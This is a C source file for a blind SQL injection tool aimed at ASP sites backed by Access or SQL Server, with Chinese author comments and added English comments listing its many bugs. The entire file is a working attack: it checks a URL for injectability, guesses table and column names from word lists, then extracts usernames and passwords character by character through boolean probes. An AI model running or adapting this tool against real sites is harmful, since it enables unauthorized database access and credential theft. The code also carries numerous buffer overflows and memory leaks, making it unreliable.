Access SQL injection code in C

//4月20日修改,代码可能比较不规范,没加注释!

#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>

#pragma comment(lib, "wininet.lib")
typedef struct{  //字段的结构
 char *name;  //字段名
 DWORD  len;   //值长度
 char *dic;  //字典
 char  *cs;   //猜长度或值时所用的串
 char *url;
 char *table; //表名
 int  m;
 int  id;
}ITEM;
/* The pair of columns main() works on: the username column and the password column. */
typedef struct{
 ITEM uitem;  /* username column */
 ITEM pitem;  /* password column */
}PR;
/*
 * Shared global state.
 *
 * `buffer` is the single response buffer: GeturlResponse() zeroes it, fills it
 * and returns it on every call, so the result of one fetch is overwritten by
 * the next, and GetMinId()'s strlwr() lowercases it in place.
 * `flag` is the marker looked for in error pages; it is set once by Getflag()
 * from the script path in the URL and is 30 bytes (Getflag() does an
 * unbounded strcpy into it).
 * `flagr` is a second marker: GetResult() and GetMinId() only accept a
 * non-error response as a real page if it also contains this substring.
 */
char buffer[1024*1024];
char flag[30];  /* error-page marker */
char *flagr="html";  /* "looks like an HTML page" marker */
/*
 * Fetch `url` over WinINet and return the response body in the global `buffer`.
 *
 * A session (InternetOpen) and a request (InternetOpenUrl, with
 * INTERNET_FLAG_RELOAD so no cached copy is served) are created per call, one
 * InternetReadFile is issued, and both handles are closed again.  The return
 * value is always the shared global `buffer`, so the caller must consume it
 * before the next call.
 *
 * Notes for the reader:
 *  - hNet and hUrlFile are not checked for NULL; a failed open is passed on to
 *    the next call and the function then returns the zeroed buffer.
 *  - Only one InternetReadFile is performed, so a body longer than what that
 *    single call returns is truncated; if exactly sizeof(buffer) bytes come
 *    back there is no terminating NUL left for the callers' strstr() calls.
 *  - bRead and dwBytesRead are computed but never inspected.
 *  - Every probe built by the callers is sent through InternetOpenUrl as a
 *    plain GET with the SQL fragment in the query string, so each one appears
 *    verbatim in the target server's access log.
 */
char *GeturlResponse(char *url) /* get the page content */
{
    DWORD dwBytesRead=0;
 memset(buffer,0,sizeof(buffer));   /* zero first so a short read is NUL-terminated */
    HINTERNET hNet=InternetOpen("Sql",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
    HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
    BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
 InternetCloseHandle(hUrlFile);
    InternetCloseHandle(hNet);
 return buffer;
}
/*
 * Derive the error-page marker from the URL and copy it into `p1`.
 *
 * Locates ".asp" in `url`, walks backwards to the preceding '/', copies the
 * remainder of the URL from that '/' into `p1`, and then tries to cut the copy
 * just after the 'p' of ".asp" so that `p1` holds the script path (e.g.
 * "/movie.asp").  main() passes the 30-byte global `flag` as `p1`.  Returns 1;
 * the 0 path is unreachable (see below).
 *
 * Notes for the reader:
 *  - `p` is not checked: without ".asp" in the URL strstr() returns NULL and
 *    `*p` is a null dereference; without a '/' before it the backwards walk
 *    runs off the front of `url`.
 *  - strcpy() copies the whole remainder of the URL (path plus query string)
 *    into the 30-byte `flag`; anything longer overflows it.
 *  - `'/0'` is a multi-character constant, not the NUL terminator `'\0'`; the
 *    byte stored is implementation-defined and the copy is not cut where the
 *    author intended.
 *  - `if(!p1)` tests the pointer argument, which is never NULL here, so the
 *    failure branch cannot run.
 *  - "/n" in the format strings is a literal slash and 'n', not a newline
 *    (the same typo recurs throughout the file).
 */
int Getflag(char *url,char *p1)  /* find the error-page marker: error pages usually echo the script path, e.g. /movie.asp, so that is used as the marker */
{
 int i;
 char *p=strstr(url,".asp");
 i=0;
 while(*p!='/')   /* back up to the start of the path component */
  p--;
 strcpy(p1,p);
 while(p1[i++]!='p');   /* i ends one past the 'p' of ".asp" */
 p1[i]='/0';   /* intended as a terminator; see note above */
 if(!p1)
 {
  printf("Get flag failed/n/n");
  return 0;
 }
 printf("The flag is %s/n/n",p1);
 return 1;
}
/*
 * Thread entry: report whether the URL reacts to a single appended quote.
 *
 * `p` points at an ITEM (copied by value; only `url` is used).  Builds
 * "<url>'" in a 1024-byte stack buffer, fetches it, and sets the thread exit
 * code to 1 when the response contains the global `flag` marker (the server
 * served its error page), else 0.  main() reads the code with
 * GetExitCodeThread() and stops on 0.
 *
 * Notes for the reader:
 *  - wsprintf() is unbounded; a `url` of 1023 or more bytes overflows `urlt`.
 *  - The trailing `return 0;` after the if/else is unreachable.
 */
DWORD WINAPI CheckUrl(LPVOID p)      /* check whether the URL is injectable */
{
 ITEM u=*(ITEM *)p;
 char urlt[1024];
    wsprintf(urlt,"%s'",u.url);
 printf("Geting the %s Response data....../n",urlt);
 if(strstr(GeturlResponse(urlt),flag))
 {
  printf("This url could be injected!/n/n");   /* error page carries the marker */
  return 1;
 }
 else
 {
  printf("This url could not be injected!/n");
  return 0;
 }
 return 0;
}
/*
 * Thread entry: try each line of "table.txt" as a table name.
 *
 * For every line, builds "<url> and exists (select * from <line>)" and fetches
 * it.  The first line whose response does NOT contain `flag` is accepted: the
 * name stays in t.table (a heap buffer owned by main(); `t` is a by-value copy
 * of the ITEM but shares that pointer) and the exit code is 1.  The exit code
 * is 0 when the word list cannot be opened or is exhausted.
 *
 * Notes for the reader:
 *  - `sizeof(t.table)` is the size of a char pointer, not of the buffer, so
 *    the memset() clears only 4 (or 8) bytes.
 *  - fgets() may store up to 99 bytes plus NUL, but main() allocates only 20
 *    bytes for t.table: any word-list line longer than 19 characters overflows
 *    the heap.
 *  - fgets()'s return value is not checked; at EOF it returns NULL and the
 *    previous contents may be probed once more before feof() becomes true.
 *  - `strlen(t.table)-1` underflows on an empty string, and `'/0'` is not the
 *    NUL terminator (see Getflag()).
 *  - The success path returns without fclose(out), leaking the FILE.
 *  - The initial strcpy(urlt,t.url) is overwritten before it is used.
 */
DWORD WINAPI Gettable(LPVOID p)   /* guess the table name */
{
 ITEM  t=*(ITEM *)p;
 FILE  *out;
 char urlt[1024];
 strcpy(urlt,t.url);
 out = fopen("table.txt", "rt");
 if(!out)
 {
  printf("can't open table dic!/n");
  return 0;
 }
 //fseek(out,0, SEEK_SET);
 while(!feof(out))
 {
  memset(t.table,0,sizeof(t.table));   /* clears sizeof(char *) bytes only */
  fgets(t.table,100, out);
  t.table[strlen(t.table)-1]='/0';   /* meant to drop the newline; see notes */
  memset(urlt,0,sizeof(urlt));
  wsprintf(urlt,"%s and exists (select * from %s)",t.url,t.table);
  puts(urlt);
  if(!strstr(GeturlResponse(urlt),flag))   /* no error page: the table exists */
  {
   printf("/nWe get the table/nThe table name is %s/n/n",t.table);
   return 1;
  }
 }
 fclose(out);
 return 0;
}
<doc_update>
/*
 * Thread entry: try each line of item.dic as a column name in item.table.
 *
 * Same shape as Gettable(): for every line of the word list (main() sets
 * "user.txt" for the username ITEM and "pass.txt" for the password ITEM) it
 * builds "<url> and exists (select <line> from <table>)" and fetches it.  The
 * first line whose response lacks `flag` is kept in item.name (a 30-byte heap
 * buffer owned by main()) and the exit code is 1; 0 if the file cannot be
 * opened or is exhausted.
 *
 * Notes for the reader:
 *  - `sizeof(item.name)` is the pointer size, so memset() clears only a few
 *    bytes; fgets(...,30,...) itself fits the 30-byte buffer.
 *  - fgets()'s NULL return at EOF is not checked, `strlen(item.name)-1`
 *    underflows on an empty string, and `'/0'` is not the NUL terminator.
 *  - The success path returns without fclose(out).
 *  - The initial strcpy(urlt,item.url) is overwritten before use.
 */
DWORD WINAPI GetItem(LPVOID p)  /* guess the column name */
{
    ITEM  item=*(ITEM *)p;
 FILE  *out;
 char  urlt[1024];
 strcpy(urlt,item.url);
 out=fopen(item.dic, "rt");
 if(!out)
 {
  printf("can't open %s dic!/n",item.dic);
  return 0;
 }
 //fseek(out,0, SEEK_SET);
 while(!feof(out))
 {
  memset(item.name,0,sizeof(item.name));   /* clears sizeof(char *) bytes only */
  fgets(item.name,30, out);
  item.name[strlen(item.name)-1]='/0';   /* meant to drop the newline; see notes */
  memset(urlt,0,sizeof(urlt));
  wsprintf(urlt,"%s and exists (select %s from %s)",item.url,item.name,item.table);
  puts(urlt);
  if(!strstr(GeturlResponse(urlt),flag))   /* no error page: the column exists */
  {
   printf("/nWe get the item/nThe item(username) is %s/n/n",item.name);
   return 1;
  }
  
 }
 fclose(out);
 return 0;
}
/*
 * Thread entry: binary-search the integer value of the SQL expression up.cs.
 *
 * Searches the open interval (m, up.m), with m starting at 1 and up.m taken
 * from the ITEM (main() uses 32 when up.cs is a length and 128 when it is a
 * character code).  Each iteration sends up to three probes of the form
 * "<url> and exists (select id from <table> where id=<id> and <cs> ...)":
 *   1. "<cs>><m> and <cs><<up.m>": if the response contains `flag`, no value
 *      lies inside the interval and the exit code is 0;
 *   2. "<cs>=<mn>" with mn=(m+up.m)/2: if the response lacks `flag` and does
 *      contain `flagr` ("html"), mn is the answer and becomes the exit code;
 *   3. "<cs>><mn>": when the response looks like an error page (contains
 *      `flag` or lacks "html") the interval shrinks to (m, mn), otherwise to
 *      (mn, up.m).
 *
 * Notes for the reader:
 *  - Both ends use strict comparisons, so a value equal to 1 or to the
 *    initial up.m is never reported.
 *  - A 1024- or 2048-byte malloc() is made per probe and never freed; `urlt`
 *    is simply overwritten with the next allocation.
 *  - The second and third conditions call GeturlResponse() twice each, i.e.
 *    two network round trips per check, both returning the same global buffer.
 *  - There is no iteration cap; termination relies on the server answering
 *    the probes consistently.
 *  - The `return 0;` after while(1) is unreachable.
 */
DWORD WINAPI GetResult(LPVOID p)            /* guess the value length and the value itself */
{
    ITEM up=*(ITEM *)p;
 char *urlt;
 int m,mn;   /* m: exclusive lower bound; mn: midpoint being tested */
 m=1;
 while(1)
 {  
  urlt=(char *)malloc(1024);
  wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d and %s<%d)",
   up.url,up.table,up.id,up.cs,m,up.cs,up.m);
  puts(urlt);
  if(strstr(GeturlResponse(urlt),flag))   /* error page: nothing inside (m, up.m) */
  {
   printf("We can't get the %s/n",up.cs);
   return 0;
  }
  else
  {
   mn=(m+(up.m))/2;
   urlt=(char *)malloc(1024*2);
   wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s=%d)",up.url,up.table,up.id,up.cs,mn);
   puts(urlt);
   if(!strstr(GeturlResponse(urlt),flag)&&strstr(GeturlResponse(urlt),flagr))   /* exact hit */
   {
    printf("The %s %s is %d/n/n",up.name,up.cs,mn);
    return mn;
   }
   urlt=(char *)malloc(1024*2);
   wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d)",up.url,up.table,up.id,up.cs,mn);
   puts(urlt);
   if(strstr(GeturlResponse(urlt),flag)||!strstr(GeturlResponse(urlt),flagr))
    up.m=mn;   /* value is below the midpoint */
   else
    m=mn;      /* value is above the midpoint */
  }
 }
 return 0;
}
/*
 * Thread entry: find the smallest row id present in ID.table.
 *
 * Probes "<url> and exists (select id from <table> where id=<id>)" for
 * id = 1, 2, ... below 8000 and sets the exit code to the first id whose
 * response lacks `flag` and whose lowercased body contains "html".  The exit
 * code is -1 (0xFFFFFFFF as a DWORD) when none is found; main() compares the
 * exit code against -1.
 *
 * Notes for the reader:
 *  - strlwr() lowercases the global `buffer` in place.
 *  - On the error-page branch id is incremented before it is printed, so the
 *    number shown is the next id to be tried, not the one just probed.
 *  - malloc(1024) per iteration, never freed.
 *  - "/n" is a literal slash-n, not a newline.
 */
DWORD WINAPI GetMinId(LPVOID p)
{
 ITEM ID=*(ITEM *)p;
 int id;
 id=1;
 char *urlt;
 while(id<8000)
 {
  urlt=(char *)malloc(1024);
  wsprintf(urlt,"%s and exists (select id from %s where id=%d)",ID.url,ID.table,id);
  puts(urlt);
  if(strstr(GeturlResponse(urlt),flag)){id++;printf("%d/n",id);}   /* error page: no such row */
  else
  {
   
   if(strstr(strlwr(GeturlResponse(urlt)),flagr))   /* normal page: the row exists */
   {printf("The min id is %d/n",id);
   return id;}
   else id++;
  }
 }
 return -1;
}
/*
 * Entry point: inject.exe <url> [userid]
 *
 * Drives the worker functions.  Each is started on its own thread and joined
 * at once (WaitForSingleObject + GetExitCodeThread), so nothing actually runs
 * concurrently; the thread exit code serves as the function's return value.
 *
 * Steps, in order:
 *   1. Append a quote to argv[1] and fetch it; if the response contains "SQL"
 *      the backend is treated as SQL Server (type 0), otherwise as Access
 *      (type 1).  `type` only selects the expression used in step 7.
 *   2. Fill the two ITEMs (username and password columns) with their buffers,
 *      word lists ("user.txt" / "pass.txt"), bound m=32 and id=1.
 *   3. Getflag() fills the global `flag`; CheckUrl() must report 1 to continue.
 *   4. Gettable() guesses the table name, which is copied to the password ITEM.
 *   5. GetItem() guesses the username column, then the password column.
 *   6. GetMinId() finds the smallest id; argv[2], when given and not smaller,
 *      overrides it.
 *   7. GetResult() runs for "len(<column>)" to obtain each value's length,
 *      then once per character position for "asc(mid(...))" (Access) or
 *      "unicode(substring(...))" (SQL Server) with bound m=128; the character
 *      codes are collected in username[] / password[] and printed with "%c".
 *
 * Notes for the reader:
 *  - `urlt` is an 80-byte heap buffer filled by the unbounded wsprintf() from
 *    argv[1]; a URL of 79 or more characters overflows it.
 *  - `if(!flag)` tests the address of a global array, which is never NULL, so
 *    the "Can't get the flag" branch never runs; Getflag()'s return value is
 *    ignored.
 *  - The malloc(10) buffers for uitem.dic / pitem.dic are leaked when the
 *    string literals are assigned; uitem.cs / pitem.cs are re-malloc'd and
 *    leaked on every iteration of the character loop.
 *  - The thread handles from Gettable() and both GetItem() runs are never
 *    passed to CloseHandle().
 *  - The character loop condition tests p.pitem.len twice and p.uitem.len
 *    never, so the username is only extracted up to the password's length and
 *    not at all when the password length is 0.
 *  - username[] and password[] hold 17 elements, but a length found by
 *    GetResult() can be as large as 31 (bound m=32, strict comparison), so
 *    positions 17 and above are written past the end of the arrays.
 *  - The "username is:" / "password is:" printf() calls pass an argument with
 *    no matching conversion, and "%c" is handed a DWORD; "/n" and "/t" are
 *    literal characters, not newline/tab (same typo as in the rest of the file).
 *  - GetMinId()'s -1 result is only checked after it has already been stored
 *    in p.uitem.id / p.pitem.id, but the check still returns before GetResult()
 *    is run.
 *  - argv[2] is parsed with atoi(); non-numeric input yields 0 and is reported
 *    as "less than min id".
 *  - `ptr` is assigned but otherwise unused; `printf("%d/n",argc)` is a leftover
 *    debug print.
 */
int main(int argc,char **argv)
{
if(argc<2)
{
printf("Useage:inject.exe http://www.xxx.net/movie.asp?id=1 userid(a number)/n");
printf("example:inject.exe http://www.xxx.net/movie.asp?id=1 1/n");
printf("        if userid is 1,then you will get the username and password /n/twhose id is 1./n");
printf("        If you don't give userid ,the id will be the minist id./n");
return 0;
}
 PR p;
 DWORD threadId,exitid;
 DWORD uexit,pexit;   /* exit codes of the username / password GetItem() runs */
 HANDLE hThrd1[40],hThrd2[40];
 int type;            /* 0 = SQL Server, 1 = Access */
 char *ptr,*url,*urlt;
 url=argv[1];
 urlt=(char *)malloc(80);   /* unbounded wsprintf() below; see notes */
 wsprintf(urlt,"%s'",url);
 if(ptr=strstr(GeturlResponse(urlt),"SQL"))  /* decide which database type is behind the page */
  type=0; /* sql server */
 else
  type=1; /* access */
 p.uitem.table=(char *)malloc(20);   /* written by Gettable() with fgets(...,100,...) */
 p.pitem.table=(char *)malloc(20);
 p.uitem.name=(char *)malloc(30);    /* written by GetItem() with fgets(...,30,...) */
 p.pitem.name=(char *)malloc(30);
 p.uitem.dic=(char *)malloc(10);     /* leaked: replaced by a literal just below */
 p.pitem.dic=(char *)malloc(10);
    p.uitem.cs=(char *)malloc(200);
 p.pitem.cs=(char *)malloc(200);
 p.uitem.url=url;
 p.pitem.url=url;
 p.uitem.dic="user.txt";
 p.pitem.dic="pass.txt";
 p.uitem.m=32;   /* upper bound for the length search */
 p.pitem.m=32;
 p.uitem.len=0;
 p.pitem.len=0;
 p.uitem.id=1;
 p.pitem.id=1;

 memset(flag,0,sizeof(flag));
 Getflag(p.uitem.url,flag);
 if(!flag)   /* always false: `flag` is an array */
 {
  printf("Can't get the flag/n/n");
  return 0;
 }
 hThrd1[0]=CreateThread(NULL,0,CheckUrl,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0],&exitid);
 CloseHandle(hThrd1[0]);
 if(!exitid)   /* CheckUrl() reported "not injectable" */
  return 0;
 hThrd1[0]=CreateThread(NULL,0,Gettable,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &exitid);   /* handle not closed */
 if(!exitid)
 {
  printf("Can't get the talbe name/n");
  return 0;
 }
 strcpy(p.pitem.table,p.uitem.table);   /* both columns live in the same table */
 hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &uexit);   /* handle not closed */
 if(!uexit)
  printf("We can't get the user item/n");
 hThrd1[0]=CreateThread(NULL,0,GetItem,(LPVOID )&p.pitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0], &pexit);   /* handle not closed */
 if(!pexit)
  printf("We can't get the pass item/n");
 hThrd1[0]=CreateThread(NULL,0,GetMinId,(LPVOID )&p.uitem,0,&threadId);
 WaitForSingleObject(hThrd1[0],INFINITE);
 GetExitCodeThread(hThrd1[0],&exitid);
 CloseHandle(hThrd1[0]);
 p.uitem.id=exitid;   /* may be -1 here; checked further down */
 p.pitem.id=exitid;
 printf("%d/n",argc);
 if(argc>2)
 {
  if(argv[2])
  {
   if(atoi(argv[2])<p.uitem.id)   /* atoi() gives 0 for non-numeric input */
    printf("The id you gived is less than min id or is not a number,/n/twe will use id as %d/n",p.uitem.id);
   else
   {
    p.uitem.id=atoi(argv[2]);
    p.pitem.id=atoi(argv[2]);
    printf("We will guest the user whose id is %d/n",atoi(argv[2]));
   }
  }
 }
 
 if(exitid==-1)   /* DWORD compared with -1: true for 0xFFFFFFFF */
 {
  printf("Get min id failed /n");
  return 0;
 }
 wsprintf(p.uitem.cs,"len(%s)",p.uitem.name);   /* first search target: the value length */
 wsprintf(p.pitem.cs,"len(%s)",p.pitem.name);
 if(uexit)
 {
  hThrd1[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
  WaitForSingleObject(hThrd1[0],INFINITE);
  GetExitCodeThread(hThrd1[0], &p.uitem.len);   /* handle not closed */
 }
 if(pexit)
 {
  hThrd2[0]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
  WaitForSingleObject(hThrd2[0],INFINITE);
  GetExitCodeThread(hThrd2[0], &p.pitem.len);   /* handle not closed */
 }
 printf("len(u) is %d/nlen(p) is %d/n/n",p.uitem.len,p.pitem.len);
 p.uitem.m=128;   /* upper bound for the character-code search */
 p.pitem.m=128;
 DWORD pnum=0;    /* character position, 0-based */
 DWORD username[17];   /* 17 slots, but len may be up to 31; see notes */
 DWORD password[17];
 memset(username,0,sizeof(username));
 memset(password,0,sizeof(password));
 while(pnum<p.pitem.len||pnum<p.pitem.len)   /* both operands test pitem; see notes */
 {
  p.uitem.cs=(char *)malloc(200);   /* leaked every iteration */
  p.pitem.cs=(char *)malloc(200);
  if(type==1)
  {
   wsprintf(p.uitem.cs,"asc(mid(%s,%d,1))",p.uitem.name,pnum+1);   /* Access expression, 1-based position */
   wsprintf(p.pitem.cs,"asc(mid(%s,%d,1))",p.pitem.name,pnum+1);
  }
  else
  {
   wsprintf(p.uitem.cs,"unicode(substring(%s,%d,1))",p.uitem.name,pnum+1);   /* SQL Server expression */
   wsprintf(p.pitem.cs,"unicode(substring(%s,%d,1))",p.pitem.name,pnum+1);
  }
  
  if(pnum<p.uitem.len&&uexit)
  {
   hThrd1[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.uitem,0,&threadId);
   WaitForSingleObject(hThrd1[pnum],INFINITE);
   GetExitCodeThread(hThrd1[pnum],&username[pnum]);   /* character code of position pnum */
   CloseHandle(hThrd1[pnum]);
  }
  if(pnum<p.pitem.len&&pexit)
  {
   hThrd2[pnum]=CreateThread(NULL,0,GetResult,(LPVOID )&p.pitem,0,&threadId);
   WaitForSingleObject(hThrd2[pnum],INFINITE);
   GetExitCodeThread(hThrd2[pnum],&password[pnum]);
   CloseHandle(hThrd2[pnum]);
  }
  pnum++;
 }
 if(!uexit)
  printf("We can't get username/n");
 else
 {
  printf("/nusername is:",p.uitem.len);   /* extra argument with no conversion */
  for(pnum=0;pnum<p.uitem.len;pnum++)
   printf("%c",username[pnum]);   /* DWORD passed to %c */
  printf("/n");
 }
 if(!pexit)
  printf("We can't get password/n");
 else
 {
  printf("/npassword is:",p.pitem.len);   /* extra argument with no conversion */
  for(pnum=0;pnum<p.pitem.len;pnum++)
   printf("%c",password[pnum]);
 }
 printf("/nGet ret ok!/n");

 return 1;
}

 

 
